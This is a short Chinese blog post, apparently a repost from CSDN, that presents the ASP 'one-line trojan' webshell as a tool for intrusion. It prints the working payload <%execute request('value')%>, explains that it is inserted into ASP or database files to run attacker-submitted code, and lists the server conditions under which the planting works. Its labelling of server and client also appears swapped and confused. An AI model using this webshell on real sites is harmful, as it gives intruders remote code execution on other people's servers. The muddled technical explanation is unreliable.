一句话木马

一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。

一句话木马的工作原理：一句话木马分析服务端与客户端。

"一句话木马"服务端（是用于本地的html提交脚本木马文件）
就是我们要用来插入到asp文件中的asp语句，（不仅仅是以asp为后缀的数据库文件），该语句将回为触发，接收入侵者通过客户端提交的数据，执行并完成相应的操作，服务端的代码内容为 <%execute request(“value”)%> 其中value可以自己修改

"一句话木马"客户端（远程服务器上被插入一句话的asp可执行文件）
用来向服务端提交控制数据的，提交的数据通过服务端构成完整的asp功能语句并执行，也就是生成我们所需要的asp木马文件

一句话木马的适用环境：

1.服务器的来宾账户有写入权限
2.已知数据库地址且数据库格式为asa或asp
3.在数据库格式不为asp或asa的情况下，如果能将一句话插入到asp文件中也可
原文链接：https://blog.csdn.net/liwei8703/article/details/6022384